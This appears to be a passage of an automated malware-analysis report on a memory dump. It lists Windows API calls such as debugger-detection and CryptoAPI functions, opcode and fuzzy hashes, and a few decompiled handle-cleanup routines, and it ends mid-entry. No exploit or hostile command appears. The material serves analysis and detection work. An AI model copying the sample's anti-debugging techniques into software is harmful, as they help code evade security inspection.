• Opcode ID: 2bffaac79343f15a9ab4d8fc7bf4e3267e869b5fc8da6a47bbedb9307f8d6cec
• Instruction ID: 704792828fc56d162407d0aea7ccb6557ad49ef95f69a08547ef501d280af1ea
• Opcode Fuzzy Hash: 2bffaac79343f15a9ab4d8fc7bf4e3267e869b5fc8da6a47bbedb9307f8d6cec
• Instruction Fuzzy Hash: 2B41B871900116AFDB30EF65CC49DBBB7BAEB85706F044199ED05A3681EE309E88CB64
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00636E19
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00636E23
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00636E30
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: fa7006ec91fa0a40d92bda836df80074fb377d0368ec52df9727d5c63540d4ec
• Instruction ID: 1ad648fa553b0912a6dc83c8a7dee00fb57a538c90bdc776c773a5d825082f3a
• Opcode Fuzzy Hash: fa7006ec91fa0a40d92bda836df80074fb377d0368ec52df9727d5c63540d4ec
• Instruction Fuzzy Hash: 2C31C474901229ABCB61DF68DC89BCDBBB9BF08310F5051DAE41CA7250EB709F858F44
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 58%
E00612CF7() {
	void* _t17;

	if( *(_t17 - 4) != 0) {
		__imp__CryptDestroyHash( *(_t17 - 4));
		 *(_t17 - 4) = 0;
	}
	if( *(_t17 - 0xc) != 0) {
		CryptDestroyKey( *(_t17 - 0xc));
		 *(_t17 - 0xc) = 0;
	}
	if( *(_t17 - 8) != 0) {
		CryptReleaseContext( *(_t17 - 8), 0);
		 *(_t17 - 8) = 0;
	}
	return  *((intOrPtr*)(_t17 - 0x10));
}

APIs
• CryptDestroyHash.ADVAPI32(00000000), ref: 00612D8A
• CryptDestroyKey.ADVAPI32(00000000), ref: 00612DA1
• CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00612DBA
Memory Dump Source
• Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID: Crypt$Destroy$ContextHashRelease
• String ID:
• API String ID: 3577760690-0
• Opcode ID: b6c80625d92adb0ee14e4f37979bb7ed13241bd55bfa726f791cfefd2bae1b66
• Instruction ID: b629278bbab49c6bdd0f8602fc49e1292fd7fb3e78111f24a0b6e6432b3049ec
• Opcode Fuzzy Hash: b6c80625d92adb0ee14e4f37979bb7ed13241bd55bfa726f791cfefd2bae1b66
• Instruction Fuzzy Hash: 10F0F8B4D00209EBDB24CF90E858BEDBBB5AF08306F188099E50163390C7784A94DF10
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 58%
E00612D78() {
	void* _t17;

	if( *(_t17 - 4) != 0) {
		__imp__CryptDestroyHash( *(_t17 - 4));
		 *(_t17 - 4) = 0;
	}
	if( *(_t17 - 0xc) != 0) {
		CryptDestroyKey( *(_t17 - 0xc));
		 *(_t17 - 0xc) = 0;
	}
	if( *(_t17 - 8) != 0) {
		CryptReleaseContext( *(_t17 - 8), 0);
		 *(_t17 - 8) = 0;
	}
	return  *((intOrPtr*)(_t17 - 0x10));
}

APIs
• CryptDestroyHash.ADVAPI32(00000000), ref: 00612D8A
• CryptDestroyKey.ADVAPI32(00000000), ref: 00612DA1
• CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00612DBA
Memory Dump Source
• Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
Similarity
• API ID: Crypt$Destroy$ContextHashRelease
• String ID:
• API String ID: 3577760690-0
Uniqueness Score: -1.00%

C-Code - Quality: 58%
E00612D58() {
	void* _t17;	/* frame pointer; the CryptoAPI handles live at fixed offsets below it */

	/* Cleanup helper: each handle is released only if it is non-zero and then cleared. */
	if( *(_t17 - 4) != 0) {	/* hash handle (HCRYPTHASH) */
		__imp__CryptDestroyHash( *(_t17 - 4));
		 *(_t17 - 4) = 0;
	}
	if( *(_t17 - 0xc) != 0) {	/* key handle (HCRYPTKEY) */
		CryptDestroyKey( *(_t17 - 0xc));
		 *(_t17 - 0xc) = 0;
	}
	if( *(_t17 - 8) != 0) {	/* provider handle (HCRYPTPROV), dwFlags = 0 */
		CryptReleaseContext( *(_t17 - 8), 0);
		 *(_t17 - 8) = 0;
	}
	return  *((intOrPtr*)(_t17 - 0x10));	/* result/status value kept at -0x10 */
}





APIs
• CryptDestroyHash.ADVAPI32(00000000), ref: 00612D8A
• CryptDestroyKey.ADVAPI32(00000000), ref: 00612DA1
• CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00612DBA
Memory Dump Source
• Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
Similarity
• API ID: Crypt$Destroy$ContextHashRelease
• String ID:
• API String ID: 3577760690-0
Uniqueness Score: -1.00%

C-Code - Quality: 58%
E00612D35() {
	void* _t17;	/* frame pointer; the CryptoAPI handles live at fixed offsets below it */

	/* Cleanup helper: each handle is released only if it is non-zero and then cleared. */
	if( *(_t17 - 4) != 0) {	/* hash handle (HCRYPTHASH) */
		__imp__CryptDestroyHash( *(_t17 - 4));
		 *(_t17 - 4) = 0;
	}
	if( *(_t17 - 0xc) != 0) {	/* key handle (HCRYPTKEY) */
		CryptDestroyKey( *(_t17 - 0xc));
		 *(_t17 - 0xc) = 0;
	}
	if( *(_t17 - 8) != 0) {	/* provider handle (HCRYPTPROV), dwFlags = 0 */
		CryptReleaseContext( *(_t17 - 8), 0);
		 *(_t17 - 8) = 0;
	}
	return  *((intOrPtr*)(_t17 - 0x10));	/* result/status value kept at -0x10 */
}





APIs
• CryptDestroyHash.ADVAPI32(00000000), ref: 00612D8A
• CryptDestroyKey.ADVAPI32(00000000), ref: 00612DA1
• CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00612DBA
Memory Dump Source
• Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
Similarity
• API ID: Crypt$Destroy$ContextHashRelease
• String ID:
• API String ID: 3577760690-0
Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(?,?,0064C284,?,?,?,?), ref: 0064C2A7
• TerminateProcess.KERNEL32(00000000,?,0064C284,?,?,?,?), ref: 0064C2AE
• ExitProcess.KERNEL32 ref: 0064C2C0
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
  • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
  • Part of subcall function 00650A7B: _free.LIBCMT ref: 00650ADD
  • Part of subcall function 00650A7B: _free.LIBCMT ref: 00650B13
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0065C49D
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: ErrorLast_free$InfoLocale
• String ID:
• API String ID: 2003897158-0
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
  • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
• EnumSystemLocalesW.KERNEL32(0065C1F6,00000001,00000000,?,-00000050,?,0065C824,00000000,?,?,?,00000055,?), ref: 0065C142
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
                                                                                                                                                    • Opcode ID: aacfbf4a627b4b936f07d74e5586264845b013b0ae0f42291045aa7ee0bb9288
                                                                                                                                                    • Instruction ID: a84a56d53759af46f554b7564a00c0183eef03001e62b5f25600a548121b3298
                                                                                                                                                    • Opcode Fuzzy Hash: aacfbf4a627b4b936f07d74e5586264845b013b0ae0f42291045aa7ee0bb9288
                                                                                                                                                    • Instruction Fuzzy Hash: CD11E937200B019FDB289F39C8915BAB792FF84769F15442DED4787B41E771A946C740
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0065794A
                                                                                                                                                      • Part of subcall function 00663322: __cftoe.LIBCMT ref: 00663369
                                                                                                                                                      • Part of subcall function 00663322: OutputDebugStringW.KERNEL32(00000000,?,?,?,?), ref: 00663378
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DebugDebuggerOutputPresentString__cftoe
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3697724916-0
                                                                                                                                                    • Opcode ID: ce9fa62fbd23e71e577159ed3953ffbf867d48fd20fe4b7894595ef7f1418490
                                                                                                                                                    • Instruction ID: bc7c2bac3631047d8fd72e9297a12ae95f87eae26dcade42befb82572a023ac3
                                                                                                                                                    • Opcode Fuzzy Hash: ce9fa62fbd23e71e577159ed3953ffbf867d48fd20fe4b7894595ef7f1418490
                                                                                                                                                    • Instruction Fuzzy Hash: 50F0A431409166BADF602E61AC52FEE371BAF437A3F180405FD48D6241CA21D91996FA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
                                                                                                                                                      • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0065C412,00000000,00000000,?), ref: 0065C6A1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                    • Opcode ID: de2009386a1cffdb683d68afba35c6464a7cefcd6e13087995c1df02e66d8e44
                                                                                                                                                    • Instruction ID: 7168756467ecb3dc5fe5d0d30eb490cdc66079d7678445616b05d06c07a746fa
                                                                                                                                                    • Opcode Fuzzy Hash: de2009386a1cffdb683d68afba35c6464a7cefcd6e13087995c1df02e66d8e44
                                                                                                                                                    • Instruction Fuzzy Hash: F0F0F972650312BFDB246620CC497FA7759EB40776F244428ED06A3240EA74FF05C6E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
                                                                                                                                                      • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0065C449,00000001,00000000,?,-00000050,?,0065C7E8,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0065C1B5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                    • Opcode ID: 38ce4c3651ef46be11f02d5ad705aab363cf0fd90eea754cac68112730adc5c1
                                                                                                                                                    • Instruction ID: b7231753b468a45f400f7ef0b38bcaa0147302344bd4f0d4506a163b6e8d30ee
                                                                                                                                                    • Opcode Fuzzy Hash: 38ce4c3651ef46be11f02d5ad705aab363cf0fd90eea754cac68112730adc5c1
                                                                                                                                                    • Instruction Fuzzy Hash: 3DF046322007046FDB245F39DCC1ABA7B92EF80379F05842CFD464B682C6B19C06C740
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00637349: RtlEnterCriticalSection.NTDLL(?), ref: 00637358
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0065148C,00000001,006A7100,0000000C,00651D2D,00000000), ref: 006514D1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1272433827-0
                                                                                                                                                    • Opcode ID: 76a9eda01183249ac21a721d4cdc8c777190591cd60ebd30187a8addd71182af
                                                                                                                                                    • Instruction ID: 55341bdcba866e19d23edaafa3919dec4ff2960c45f431f7e8d5f292be1c0d9c
                                                                                                                                                    • Opcode Fuzzy Hash: 76a9eda01183249ac21a721d4cdc8c777190591cd60ebd30187a8addd71182af
                                                                                                                                                    • Instruction Fuzzy Hash: 9FF0F672A44200EFE740EF98E842B8D7BF2EB05322F10511EF800DB2A0CB754945CF44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
                                                                                                                                                      • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0065BFC0,00000001,00000000,?,?,0065C846,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0065C09E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                    • Opcode ID: 1882796f9e24413673177dca956e785dddd5402e60a41057a6c7f6f79cc13622
                                                                                                                                                    • Instruction ID: 400e91cb4fad140b7e992f87a8f7bbc48d48608ddb305a27086d44f0376feea7
                                                                                                                                                    • Opcode Fuzzy Hash: 1882796f9e24413673177dca956e785dddd5402e60a41057a6c7f6f79cc13622
                                                                                                                                                    • Instruction Fuzzy Hash: F1F0E5363003059BCB149F35DC85AAA7F96EFC1765F064058EE058B691C6769847DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0064DE4B,?,20001004,00000000,00000002,?,?,0064D1AC), ref: 00651EF0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                    • Opcode ID: c169462129e753065d7fddf8c9a0d2e87f719c81d2c08b8d7ae68d115e81ecc9
                                                                                                                                                    • Instruction ID: 7897f5a9bf3258645f599c728423f8a6beb575398bf655b65d6abc92c4635bc2
                                                                                                                                                    • Opcode Fuzzy Hash: c169462129e753065d7fddf8c9a0d2e87f719c81d2c08b8d7ae68d115e81ecc9
                                                                                                                                                    • Instruction Fuzzy Hash: AEE04F35540619BBCF222F60DC09FAF3E17EF45762F044114FE456A221CF718A22ABD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(Function_0003748C,00000001), ref: 006515B3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                    • Opcode ID: b2292357c4ecf6d3439f5c64ba75079f2b6b2f9e4755c7028d3b69e714fda179
                                                                                                                                                    • Instruction ID: 83df19bda851720390e67b5733754b6039bdab8b134142e2120f1c70b8d8833d
                                                                                                                                                    • Opcode Fuzzy Hash: b2292357c4ecf6d3439f5c64ba75079f2b6b2f9e4755c7028d3b69e714fda179
                                                                                                                                                    • Instruction Fuzzy Hash: 3DD0A770080304BFDB409F20EC8E9053F97D341350F102119F9480B270DEB168C2CB88
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.487458396.00000000006B1000.00000040.00020000.sdmp, Offset: 006B1000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 534bad554abf5525a9623d87ff003475e141d78cd7fec20d07915e716a1b90ba
                                                                                                                                                    • Instruction ID: aeb0c6f1c3db526d7e5d1c37b70f59a86ce7ff7ff3e13c231c0acb13c7373400
                                                                                                                                                    • Opcode Fuzzy Hash: 534bad554abf5525a9623d87ff003475e141d78cd7fec20d07915e716a1b90ba
                                                                                                                                                    • Instruction Fuzzy Hash: 2A11AFB3350100AFD754CE55DC91EE6B3DAEB9A3317698066EC08CB301E636EC82C7A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 233865af70df2c05dc7303e63745cc6250f39fbe00f17b3cbaee293b3360815f
                                                                                                                                                    • Instruction ID: 360c52fcfc40cc51bb4c2641da2046b03cd071cbdd53f91a2ba830c7dd5dd805
                                                                                                                                                    • Opcode Fuzzy Hash: 233865af70df2c05dc7303e63745cc6250f39fbe00f17b3cbaee293b3360815f
                                                                                                                                                    • Instruction Fuzzy Hash: 90F09072654220DBCB269A5C9A09FD976EEE745B52F150456FA02DB390C2B0DE44C7E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
• Opcode ID: 179f6df4a9ab3d296bf2d7deb77bed35367538074abb16f21de14b1170bb0d39
• Instruction ID: bd8f583ca0e0c6283a8a9a353a91bbdd2567e59b8d353c1608080d8c3e079342
• Opcode Fuzzy Hash: 179f6df4a9ab3d296bf2d7deb77bed35367538074abb16f21de14b1170bb0d39
• Instruction Fuzzy Hash: CDF0BE72240201EFCB55CF6CD94AF9677EAEF46706F200468E906DB392C630DE89E760
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6faab42cd9fcedb4bb5408000016003c13921a87bcfbe709cceecc0032ae90a8
• Instruction ID: bcdbb5972ad310c6984376507063d83f8ecc5ba0cae36585f1d82af65cf36668
• Opcode Fuzzy Hash: 6faab42cd9fcedb4bb5408000016003c13921a87bcfbe709cceecc0032ae90a8
• Instruction Fuzzy Hash: 47F06571615334EBCB16CB4CD805B9AB7EDEB45B52F1150A6F901EB250D270DE44C7D4
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 90be1ca2e33f9ef724b87a3879082865cacf3c6c0ff433f8a3b9305d71344798
• Instruction ID: e909591f8044435bca716c610b985bcb26db2b016aad13bad3b443b91640d872
• Opcode Fuzzy Hash: 90be1ca2e33f9ef724b87a3879082865cacf3c6c0ff433f8a3b9305d71344798
• Instruction Fuzzy Hash: 6BF03072A21224DBCB16CB4CD805B8977EDEB45B55F114096F905D7251C7B0DE44C7D0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 66d1e773c84b8cd00454fb817175d3d94ddb7d8e5aca766f6ac68419e19f4234
• Instruction ID: a684531edc90ceb10aa0eec7710adc2a2d8f72449d15be1a43e9ab63483064db
• Opcode Fuzzy Hash: 66d1e773c84b8cd00454fb817175d3d94ddb7d8e5aca766f6ac68419e19f4234
• Instruction Fuzzy Hash: FCE06D35600248DFCB45CF59C554B4ABBFAEB48385F2051B8E805C7250D334DE44CB50
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aa5a65597762acc1f8cd742286ca744c9d6acb6d90d1fe43ea0ac68eb355452a
• Instruction ID: 19680e6f2caa69858db6b402060b922a75f35120aa0a0ec6ebd22ebc55d19639
• Opcode Fuzzy Hash: aa5a65597762acc1f8cd742286ca744c9d6acb6d90d1fe43ea0ac68eb355452a
• Instruction Fuzzy Hash: 19E06535A10248EFCB45CF69C544E8ABBFAEB88349F2044A8E809C7651E734DE88CB10
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5a658995e33e5c6ea103652b8e40e9f4c2b8ab9ae597e673441ba442df2d8f7c
• Instruction ID: be62d8520a1e86f7ef01323c7483e10880abe4791a7c2663b4732bb0817ea575
• Opcode Fuzzy Hash: 5a658995e33e5c6ea103652b8e40e9f4c2b8ab9ae597e673441ba442df2d8f7c
• Instruction Fuzzy Hash: 32E08C32911228EBCB58DF89C94498AF3EDEB85B41F15409AB901D3200C270DE04CBE4
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 29134237c0010b784aba2fdbcaf31b9347ac41b4b804e180e77644d2e2ef90ba
• Instruction ID: 093e79ade469e2f509731d18cd324fd386195a7edbc1f5484bf205983013ca63
• Opcode Fuzzy Hash: 29134237c0010b784aba2fdbcaf31b9347ac41b4b804e180e77644d2e2ef90ba
• Instruction Fuzzy Hash: CBE0E235501248EFCB44DFA8C549F8AB7F9EB48755F1148A8E809D7251D238EE84DA14
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: _free$___from_strstr_to_strchr
• String ID:
• API String ID: 3409252457-0
• Opcode ID: da6b7c740ccc37692321bfdbb543ec06c740dc77ba23143f1fcd6f75ed705754
• Instruction ID: 611c7d60cb42c02ec1917097efd8cc86fa3bea8f0ad3cdb794fb0ac44466fdcd
• Opcode Fuzzy Hash: da6b7c740ccc37692321bfdbb543ec06c740dc77ba23143f1fcd6f75ed705754
• Instruction Fuzzy Hash: 9ED10A71904305EFEB20AFB88882AADB7A7AF06311F14456EFD1197381E731D949CB65
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
• Opcode ID: d3996e18bd063e9abe82057b431c710b4062804bc8cbb4aeeb0ae77ff326072f
• Instruction ID: b7497c7baeb037fadfa237b47405af4cc05c4685c4ad827c960c70d15cd57c30
• Opcode Fuzzy Hash: d3996e18bd063e9abe82057b431c710b4062804bc8cbb4aeeb0ae77ff326072f
• Instruction Fuzzy Hash: FED18D719046499FDB21DFB8C881BEEBBF6BF09300F14416DE895A7382DB75A845CB60
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___free_lconv_mon.LIBCMT ref: 0065B3AA
  • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A55B
  • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A56D
  • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A57F
  • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A591
  • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A5A3
  • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A5B5
  • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A5C7
  • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A5D9
  • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A5EB
  • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A5FD
  • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A60F
  • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A621
  • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A633
• _free.LIBCMT ref: 0065B39F
  • Part of subcall function 00650CDF: HeapFree.KERNEL32(00000000,00000000,?,0064E5D9), ref: 00650CF5
  • Part of subcall function 00650CDF: GetLastError.KERNEL32(?,?,0064E5D9), ref: 00650D07
• _free.LIBCMT ref: 0065B3C1
• _free.LIBCMT ref: 0065B3D6
• _free.LIBCMT ref: 0065B3E1
• _free.LIBCMT ref: 0065B403
• _free.LIBCMT ref: 0065B416
• _free.LIBCMT ref: 0065B424
• _free.LIBCMT ref: 0065B42F
• _free.LIBCMT ref: 0065B467
• _free.LIBCMT ref: 0065B46E
• _free.LIBCMT ref: 0065B48B
• _free.LIBCMT ref: 0065B4A3
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 6b37ca464fb7584ff389523134854ab8788f359ed53a479d6b421e8658c3a459
• Instruction ID: 31ee88ea625b30e06ffa448752e201bc91e6239b8c54e4daac32ebc3b214b2ff
• Opcode Fuzzy Hash: 6b37ca464fb7584ff389523134854ab8788f359ed53a479d6b421e8658c3a459
• Instruction Fuzzy Hash: 53318132500741AFEB70AA79D946B9A73E7FF01352F10551EE884E7255DB70EC49C724
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
